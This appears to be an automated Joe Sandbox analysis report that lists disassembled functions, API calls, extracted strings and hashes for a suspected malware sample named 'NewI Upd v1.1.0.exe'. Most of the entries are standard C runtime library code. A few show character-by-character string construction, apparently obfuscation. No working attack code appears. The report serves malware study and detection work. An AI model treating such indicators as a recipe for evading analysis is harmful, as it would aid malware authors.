csm, xrefs: 00880390
csm, xrefs: 008804E6
csm, xrefs: 00880411

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
String ID: csm$csm$csm
API String ID: 2995349249-393685449
Opcode ID: 133d8c400b900b2f2ff1f66a0d9d679e1f7d2857701b837c61dc4aad9c385da7
Instruction ID: 9a66b6052bab30e7b99a23bd53bcd5d82c2412ad6340059c73c30a52784a575b
Opcode Fuzzy Hash: 133d8c400b900b2f2ff1f66a0d9d679e1f7d2857701b837c61dc4aad9c385da7
Instruction Fuzzy Hash: F1F172759002099BCF48FF98D891AAE7779FF54304F508559F909DB242DB30EA89CFA2

Function 008A4D30 Relevance: 38.7, APIs: 10, Strings: 12, Instructions: 225COMMONLIBRARYCODE

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 008A4E2A
__invoke_watson_if_error.LIBCMTD ref: 008A4E33
__aligned_msize.LIBCMTD ref: 008A4EB7
__invoke_watson_if_error.LIBCMTD ref: 008A4EC0

Strings

strcpy_s(result, result_count, "0"), xrefs: 008A4E18
strcpy_s(result, result_count, "1#IND" ), xrefs: 008A4F86
1#IND, xrefs: 008A4F8B
, xrefs: 008A4D73
__acrt_fltout, xrefs: 008A4E13, 008A4EA0, 008A4EEB, 008A4F36, 008A4F81
strcpy_s(result, result_count, "1#QNAN"), xrefs: 008A4EF0
1#QNAN, xrefs: 008A4EF5
minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp, xrefs: 008A4E0E, 008A4E9B, 008A4EE6, 008A4F31, 008A4F7C
1#INF, xrefs: 008A4EAA
strcpy_s(result, result_count, "1#SNAN"), xrefs: 008A4F3B
strcpy_s(result, result_count, "1#INF" ), xrefs: 008A4EA5
1#SNAN, xrefs: 008A4F40

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __aligned_msize__invoke_watson_if_error
String ID: $1#IND$1#INF$1#QNAN$1#SNAN$__acrt_fltout$minkernel\crts\ucrt\src\appcrt\convert\cfout.cpp$strcpy_s(result, result_count, "0")$strcpy_s(result, result_count, "1#IND" )$strcpy_s(result, result_count, "1#INF" )$strcpy_s(result, result_count, "1#QNAN")$strcpy_s(result, result_count, "1#SNAN")
API String ID: 4254006664-1152488507
Opcode ID: af8b68509c94c7042c0db34fb9defecd287242f35371f1ad832634a839bbfdff
Instruction ID: 671f880d90555199d6e5cc2b4c31d58718d6d9b058d148020c9efb03b7428b30
Opcode Fuzzy Hash: af8b68509c94c7042c0db34fb9defecd287242f35371f1ad832634a839bbfdff
Instruction Fuzzy Hash: 4C913AB0E40208ABDB04EF98C852BEEBBB1FF55704F148158F515AB782E7B5A941CB91

Function 004319D8 Relevance: 35.1, APIs: 1, Strings: 19, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004319DF

Strings

v, xrefs: 00431B2D
6, xrefs: 00431BE5
w, xrefs: 00431B6D
(, xrefs: 00431BD5
., xrefs: 00431BA5
f, xrefs: 00431B4D
, xrefs: 00431B95
f, xrefs: 00431B5D
e, xrefs: 00431AED
0, xrefs: 00431C64
$, xrefs: 00431B75
,, xrefs: 00431BB5
z, xrefs: 00431B0D
c, xrefs: 00431B3D
", xrefs: 00431B85
), xrefs: 00431BDD
i, xrefs: 00431AFD
&, xrefs: 00431B65
*, xrefs: 00431BC5

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: AllocString
String ID: $"$$$&$($)$*$,$.$0$6$c$e$f$f$i$v$w$z
API String ID: 2525500382-2085099315
Opcode ID: 6d7c7a0dbb0022a8370e9057f8a9e3f48d7905c07737ac29dc6849f0bce9359b
Instruction ID: 56e7b24f0a7cd8751bd983cfaaa3b2942c6c7838bcdb3ae0373f041d06e99b7c
Opcode Fuzzy Hash: 6d7c7a0dbb0022a8370e9057f8a9e3f48d7905c07737ac29dc6849f0bce9359b
Instruction Fuzzy Hash: D4716C2010DBC28DD332CB7C985878BBFD16BA7224F084B9EE0E95B2E6D77541468767

Function 00892B00 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00892B40
__invoke_watson_if_error.LIBCMTD ref: 00892BE3

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00892F8F
@, xrefs: 00892CAF
common_message_window, xrefs: 00892BBB, 00892F1E, 00892F5E
..., xrefs: 00892E1E
@, xrefs: 00892C0C
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 00892BB6, 00892F19, 00892F59
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 00892BC0
wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00892F63
_CrtDbgReport: String too long or IO Error, xrefs: 00892F68
(*_errno()), xrefs: 00892F23

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: (*_errno())$...$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
API String ID: 3976807648-1633980848
Opcode ID: 2ef668c008668f5e49dd8b9378651608a960bc1ae8a380c70a6e9e4ea92bc72c
Instruction ID: e92116bc0299e89618645e7ff231dc54034431cf2a3f5eac814f6a5304bd68fc
Opcode Fuzzy Hash: 2ef668c008668f5e49dd8b9378651608a960bc1ae8a380c70a6e9e4ea92bc72c
Instruction Fuzzy Hash: 19D15AB0940229FBDF24EF94CC89BDAB7B0FB54304F0441E9E509A6291D7749B99CF92

Function 008925F0 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 302COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00892630
__invoke_watson_if_error.LIBCMTD ref: 008926D3

Strings

Microsoft Visual C++ Runtime Library, xrefs: 00892A70
common_message_window, xrefs: 008926AB, 008929FF, 00892A3F
..., xrefs: 008928FF
@, xrefs: 008926FC
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 008926A6, 008929FA, 00892A3A
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 008926B0
wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00892A44
_CrtDbgReport: String too long or IO Error, xrefs: 00892A49
(*_errno()), xrefs: 00892A04
@, xrefs: 00892790

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: (*_errno())$...$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")
API String ID: 3976807648-1633980848
Opcode ID: e7d6dca3cba4404193129b723109dd4b30e8f5457faec6d11f31bbfd09bb0aeb
Instruction ID: 777dcd0efb709580318ef36ad3c08772ce10cc832589a606466306353621a5b7
Opcode Fuzzy Hash: e7d6dca3cba4404193129b723109dd4b30e8f5457faec6d11f31bbfd09bb0aeb
Instruction Fuzzy Hash: F4D149B4900228EBDF24EF54CC4ABDAB7B5FB69304F0441E9E609A6281D3749AD5CF91

Function 00886F90 Relevance: 25.0, APIs: 1, Strings: 13, Instructions: 463COMMONLIBRARYCODE

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 00886FCF

Strings

Client hook re-allocation failure., xrefs: 0088709B
Client hook re-allocation failure at file %hs line %d., xrefs: 0088707E
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00887195, 00887200, 00887419, 00887479, 008874CC
Error: memory allocation: bad memory block type.Memory allocated at %hs(%d)., xrefs: 008870F1
Error: possible heap corruption at or near 0x%p, xrefs: 00887229
The Block at 0x%p was allocated by aligned routines, use _aligned_realloc(), xrefs: 00887147
__acrt_first_block == old_head, xrefs: 008874BB
Error: memory allocation: bad memory block type., xrefs: 0088710E
%ls, xrefs: 00887189, 008871F4, 0088740D, 0088746D, 008874C0
old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks, xrefs: 008871EF
_CrtIsValidHeapPointer(block), xrefs: 00887184
reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head), xrefs: 00887408
__acrt_last_block == old_head, xrefs: 00887468

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __wcstombs_l
String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
API String ID: 3007373345-458177602
Opcode ID: 08812db9bdec0cf840215f5c2ff6285428f105970fd7d0397f8ef3edec81394f
Instruction ID: 076fb79feb56906fd52731495c8f02bcec831a0da0913a628bbca47b30b4bf37
Opcode Fuzzy Hash: 08812db9bdec0cf840215f5c2ff6285428f105970fd7d0397f8ef3edec81394f
Instruction Fuzzy Hash: B5026874A44209AFDB14EF98DD86FAA77B1FB49304F348118E915EB392D331E941CBA1

Function 004323E4 Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 95COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043242A

Strings

!, xrefs: 00432497
[, xrefs: 00432479
], xrefs: 00432483
%, xrefs: 004324AB
&, xrefs: 004324B0
U, xrefs: 0043245B
Q, xrefs: 00432447
', xrefs: 004324B5
Y, xrefs: 0043246F
W, xrefs: 00432465
_, xrefs: 0043248D
S, xrefs: 00432451
#, xrefs: 004324A1

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitVariant
String ID: !$#$%$&$'$Q$S$U$W$Y$[$]$_
API String ID: 1927566239-3921750754
Opcode ID: b2cc1a3b884791a097613dd928cd760dccae64a3ec2097dd97ae31fec544337d
Instruction ID: 17e26026965e7bee98b4eefb4d4749cc3812fca4b7853f963f47d17c05ef618d
Opcode Fuzzy Hash: b2cc1a3b884791a097613dd928cd760dccae64a3ec2097dd97ae31fec544337d
Instruction Fuzzy Hash: F541257450C7C18AD3258B28889879BBFD1AB9A328F485B5CE4E94B3D2C7B98405CB57

Function 0043275F Relevance: 24.6, APIs: 1, Strings: 13, Instructions: 81COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00432794

Strings

U, xrefs: 004327C5
Y, xrefs: 004327D9
%, xrefs: 00432815
S, xrefs: 004327BB
[, xrefs: 004327E3
#, xrefs: 0043280B
', xrefs: 0043281F
], xrefs: 004327ED
_, xrefs: 004327F7
W, xrefs: 004327CF
Q, xrefs: 004327B1
&, xrefs: 0043281A
!, xrefs: 00432801

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: InitVariant
String ID: !$#$%$&$'$Q$S$U$W$Y$[$]$_
API String ID: 1927566239-3921750754
Opcode ID: dfb06baab381fb4b6b2c2671629a1003674da17e5271b1870dfb0cf66c3bcced
Instruction ID: cea9bca1cad97a37013d5375c41eeffecc952c046f5a0125e7bb360937c1a7c0
Opcode Fuzzy Hash: dfb06baab381fb4b6b2c2671629a1003674da17e5271b1870dfb0cf66c3bcced
Instruction Fuzzy Hash: E641267050C7C18ED3258B28888875BBFD16B9A228F485B9DF4E94B3D2C3B98505CB57

Function 00432A2E Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00432A38
VariantInit.OLEAUT32 ref: 00432A4B

Strings

>, xrefs: 00432A7E
", xrefs: 00432A9E
<, xrefs: 00432A8E
(, xrefs: 00432AEE
8, xrefs: 00432A6E
, xrefs: 00432AAE
$, xrefs: 00432ACE
&, xrefs: 00432ABE
., xrefs: 00432AFE
*, xrefs: 00432ADE
,, xrefs: 00432B0E

Memory Dump Source

Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd

Similarity

API ID: Variant$ClearInit
String ID: $"$$$&$($*$,$.$8$<$>
API String ID: 2610073882-253838457
Opcode ID: e343c5626c0b20c09b7ed7b8af474be22a20b4315969390f4c7b0b42aea5aa09
Instruction ID: 8be586371eeeef64585bfa29eccbbd651e4148937e201bdf883ccd51c2959361
Opcode Fuzzy Hash: e343c5626c0b20c09b7ed7b8af474be22a20b4315969390f4c7b0b42aea5aa09
Instruction Fuzzy Hash: AB51642260C7D18AD331CA3C894938BBFD16BE7220F494BADD4E8973D6D6745506C793

Function 008A2AD0 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_strlen.LIBCMT ref: 008A2E16

Strings

minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp, xrefs: 008A2B08, 008A2B40, 008A2B91, 008A2BC9, 008A2C43, 008A2C7B, 008A2CCC, 008A2D04
buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1), xrefs: 008A2C35, 008A2C85
%ls, xrefs: 008A2AFF, 008A2B88, 008A2C3A, 008A2CC3
pflt != nullptr, xrefs: 008A2CBE, 008A2D0E
buffer != nullptr, xrefs: 008A2AFA, 008A2B4A
0, xrefs: 008A2D6F
buffer_count > 0, xrefs: 008A2B83, 008A2BD3
__acrt_fp_strflt_to_string, xrefs: 008A2B45, 008A2BCE, 008A2C80, 008A2D09

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: _strlen
String ID: %ls$0$__acrt_fp_strflt_to_string$buffer != nullptr$buffer_count > 0$buffer_count > static_cast<size_t>((digits > 0 ? digits : 0) + 1)$minkernel\crts\ucrt\src\appcrt\convert\_fptostr.cpp$pflt != nullptr
API String ID: 4218353326-3579526835
Opcode ID: a0aaff7e91d8f9ac613244c66ab3c179169c432cf1512787b505437192cd1fad
Instruction ID: 89304b9e7e64062d6eedd91aa7cb913b6d5341289060788ab693aa6b11ccd7bb
Opcode Fuzzy Hash: a0aaff7e91d8f9ac613244c66ab3c179169c432cf1512787b505437192cd1fad
Instruction Fuzzy Hash: 4CB18170E44208EFEB24DF98CC41BEE7BB0FB55714F144159E815AB382D3799A41CB91

Function 0089D440 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 0089D5DF
__invoke_watson_if_error.LIBCMTD ref: 0089D5FE

Strings

e+000, xrefs: 0089D5D2
%ls, xrefs: 0089D489
strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), ", xrefs: 0089D5F8
d, xrefs: 0089D65D
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0089D492, 0089D4CA, 0089D5EE
result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 0089D484, 0089D4D4
fp_format_e_internal, xrefs: 0089D4CF, 0089D5F3

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: __aligned_msize__invoke_watson_if_error
String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
API String ID: 4254006664-2583523412
Opcode ID: c2313f491fc83a8fb76754bc161b5c67a5fa649ee7ce15c5dbdbb2cf2c949538
Instruction ID: 203c358678982c8e218814dc3de4701c1462b6b666faf004190691e8c90ec6c9
Opcode Fuzzy Hash: c2313f491fc83a8fb76754bc161b5c67a5fa649ee7ce15c5dbdbb2cf2c949538
Instruction Fuzzy Hash: 81A14D70A04248EFCF04DF98C991BADBBB1FF89308F288199E415AB391D774AE40DB55

Function 00899E10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 00899ECF
__MarkAllocaS.LIBCMTD ref: 00899ED8

Part of subcall function 00898480: MultiByteToWideChar.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?), ref: 008984B3

std::_Timevec::_Timevec.LIBCPMTD ref: 00899EF3
std::_Timevec::_Timevec.LIBCPMTD ref: 00899EFE
std::_Mutex::_Lock.LIBCPMTD ref: 00899F19
std::_Mutex::_Lock.LIBCPMTD ref: 00899F7D
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,00000000), ref: 00899FA4
std::_Mutex::_Lock.LIBCPMTD ref: 00899FB0

Strings

minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp, xrefs: 00899EB9

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiStringTypeWide__wcstombs_l
String ID: minkernel\crts\ucrt\src\appcrt\locale\getstringtypea.cpp
API String ID: 2378836076-24854585
Opcode ID: 208ebfb34313f0d84a896e6ccc529d171d1fcbb90ffae077369d0fd8b7cce06a
Instruction ID: c568190689e4979268b08a01c4b972c90616d434612057a945402844c73f718f
Opcode Fuzzy Hash: 208ebfb34313f0d84a896e6ccc529d171d1fcbb90ffae077369d0fd8b7cce06a
Instruction Fuzzy Hash: 9C5117B1910209EBCF04FF98D996AEEB7B8FF54304F544158F505E7281EB70AA04CBA1

Function 00885E90 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 252COMMONLIBRARYCODE

Download Yara Rule

Strings

offset == 0 || offset < size, xrefs: 00886021, 00886069
minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp, xrefs: 00885FAC, 00885FD9, 00886032, 0088605F
Damage before 0x%p which was allocated by aligned routine, xrefs: 00885F53
%ls, xrefs: 00885FA0, 00886026
_aligned_offset_realloc_dbg, xrefs: 00885FDE, 00886064
The block at 0x%p was not allocated by _aligned routines, use realloc(), xrefs: 00885F05
IS_2_POW_N(alignment), xrefs: 00885F9B, 00885FE3

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
String ID: %ls$Damage before 0x%p which was allocated by aligned routine$IS_2_POW_N(alignment)$The block at 0x%p was not allocated by _aligned routines, use realloc()$_aligned_offset_realloc_dbg$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$offset == 0 || offset < size
API String ID: 0-3113323069
Opcode ID: e93c6cf6b19ed1aaefe7c934726236cc235743d77832f195251f079236f578c9
Instruction ID: 25c01673c6e3159159c14134e109e5c2bfd4add816f6c2ad31f92de3f6169500
Opcode Fuzzy Hash: e93c6cf6b19ed1aaefe7c934726236cc235743d77832f195251f079236f578c9
Instruction Fuzzy Hash: B7918F74A00209AFDF14EF98DC46BAE77B1FB44304F148518F915EB382E675AA50CBA5

Function 00882370 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 008823DD, 0088240A
common_configure_argv, xrefs: 0088240F
%ls, xrefs: 008823D1
C:\Users\user\Desktop\NewI Upd v1.1.0.exe, xrefs: 00882447, 00882460, 008824A3
mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments, xrefs: 008823CC, 00882414

Memory Dump Source

Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd

Similarity

API ID:
